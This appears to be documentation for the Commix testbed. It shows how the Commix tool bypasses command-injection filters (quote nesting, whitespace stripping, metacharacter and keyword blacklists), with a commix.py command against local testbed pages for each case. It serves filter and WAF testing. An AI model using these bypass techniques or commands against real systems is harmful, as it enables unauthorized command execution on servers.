The following command injection filter bypass techniques are demonstrated using the official dockerized version of the Commix testbed. This Docker image provides a controlled environment to test various types of command injection vulnerabilities, including:

• Classic, Blind, and Time-based injections
• Injections through HTTP headers, cookies, JSON/XML payloads
• Obfuscated and filtered inputs

Using this testbed, researchers and security professionals can reliably reproduce bypasses and validate the effectiveness of web application firewalls (WAFs), input validation logic, and server-side filters in a safe environment. These examples showcase how Commix can automatically or manually evade common input sanitization techniques such as:

• Characters that are commonly blacklisted in shell execution (such as semicolon, pipe, or ampersand)
• Filters that only allow predefined commands
• Input fields that restrict the number of characters
• Filters that rely on encoding patterns

These scenarios help demonstrate how Commix's payload crafting, tampering techniques, and options can successfully bypass filters.

Blocking Mechanism:
The filter validates that the input is a valid domain name using a regex that only allows alphanumeric characters, dots, and hyphens, blocking spaces and shell special characters.

Blocking Mechanism Bypass:
Commix appends a suffix like d.e.f that fits the domain pattern, allowing payloads to be wrapped in a domain-like string and pass validation.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/lax_domain_name.php" \
--data="addr=127.0.0.1" \
--suffix="d.e.f"

Blocking Mechanism:
The input is enclosed within multiple nested quotes, making it difficult to escape and inject commands because each quote must be properly escaped.

Blocking Mechanism Bypass:
With --level=3, commix crafts payloads with escaping sequences, quote terminations, or concatenations to break out of nested quotes and inject commands effectively.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/nested_quotes.php" \
--data="addr=127.0.0.1" \
--level=3

Blocking Mechanism:
All spaces are stripped from the input, preventing typical shell argument separation.

Blocking Mechanism Bypass:
Commix uses the space2ifs tamper script to replace spaces with the shell’s internal field separator $IFS, preserving argument separation without literal spaces.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_space.php" \
--data="addr=127.0.0.1" \
--tamper="space2ifs"

Blocking Mechanism:
The filter removes spaces and common shell metacharacters like colon, pipe, and ampersand, blocking command chaining and argument separation.

Blocking Mechanism Bypass:
Commix uses file injection technique (--technique=f) to write the payload to a file and execute it, avoiding forbidden characters in input. Also, it uses space2htab tamper script to replace spaces with tabs, which can act as separators.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand.php" \
--data="addr=127.0.0.1" \
--technique=f \
--web-root="/var/www/commix-testbed.com/public_html/" \
--tamper="space2htab"

Blocking Mechanism:
Same as previous but additionally blocks the dollar sign $, disallowing variable expansions.

Blocking Mechanism Bypass:
Commix again uses file injection technique (--technique=f) and space2htab tamper script, avoiding the use of $ entirely, relying on tabs instead of spaces.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" \
--data="addr=127.0.0.1" \
--technique=f \
--web-root="/var/www/commix-testbed.com/public_html/" \
--tamper="space2htab"

Blocking Mechanism:

Spaces are allowed but $, |, :, and & are blocked, restricting common shell operations.

Blocking Mechanism Bypass:
Commix adapts by using file injection technique (--technique=f) with space2htab tamper script to bypass these filters.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php" \
--data="addr=127.0.0.1" \
--technique=f \
--web-root="/var/www/commix-testbed.com/public_html/" \
--tamper="space2htab"

Blocking Mechanism:
All whitespace characters are stripped, preventing command separation.

Blocking Mechanism Bypass:
Commix uses the space2ifs tamper to replace spaces with $IFS. Because $IFS expands to whitespace in shells, this effectively restores the necessary command separators without using literal whitespace characters.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars.php" \
--data="addr=127.0.0.1" \
--tamper="space2ifs"

Blocking Mechanism:
Input must start with an alphanumeric character and no spaces are allowed.

Blocking Mechanism Bypass:
Commix crafts payloads that start with an alphanumeric character to comply with the filter, while replacing spaces with $IFS using space2ifstamper script, thus bypassing the whitespace restriction.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_start_alphanum.php" \
--data="addr=127.0.0.1" \
--tamper="space2ifs"

Blocking Mechanism:
Input must end with a non-alphanumeric character and spaces are disallowed.

Blocking Mechanism Bypass:
Commix generates payloads that respect the non-alphanumeric end character constraint, appending safe suffixes such as punctuation. Spaces are replaced with $IFS (via space2ifs tamper script) to circumvent whitespace filtering.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_stop_alnum.php" \
--data="addr=127.0.0.1" \
--tamper="space2ifs"

Blocking Mechanism:
Input ending with alphanumeric characters is blocked, preventing common payload suffixes.

Blocking Mechanism Bypass:
Commix appends non-alphanumeric suffixes (like semicolon ; or whitespace) to the payload to pass the filter while preserving execution.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/simple_stop_alphanum.php" \
--data="addr=127.0.0.1"

Blocking Mechanism:
Multiple OS commands are blacklisted, blocking common injection keywords.

Blocking Mechanism Bypass:
Commix prepends the payload with benign alphanumeric characters to comply with the filter and still execute the intended injection.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/simple_start_alphanum.php" \
--data="addr=127.0.0.1"

Description:
This filter attempts to block known command names (like echo,powershell,nc,whoami, etc.) by inspecting keywords. Commix applies the uninitializedvariable tamper, which inserts uninitialized shell variables (e.g., ${AB}, ${TB} etc) between characters, obfuscating the command in a way that bypasses keyword detection while remaining syntactically valid to the shell.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/filters/multiple_os_commands_blacklisting.php" \
--data="addr=127.0.0.1" \
--tamper="uninitializedvariable"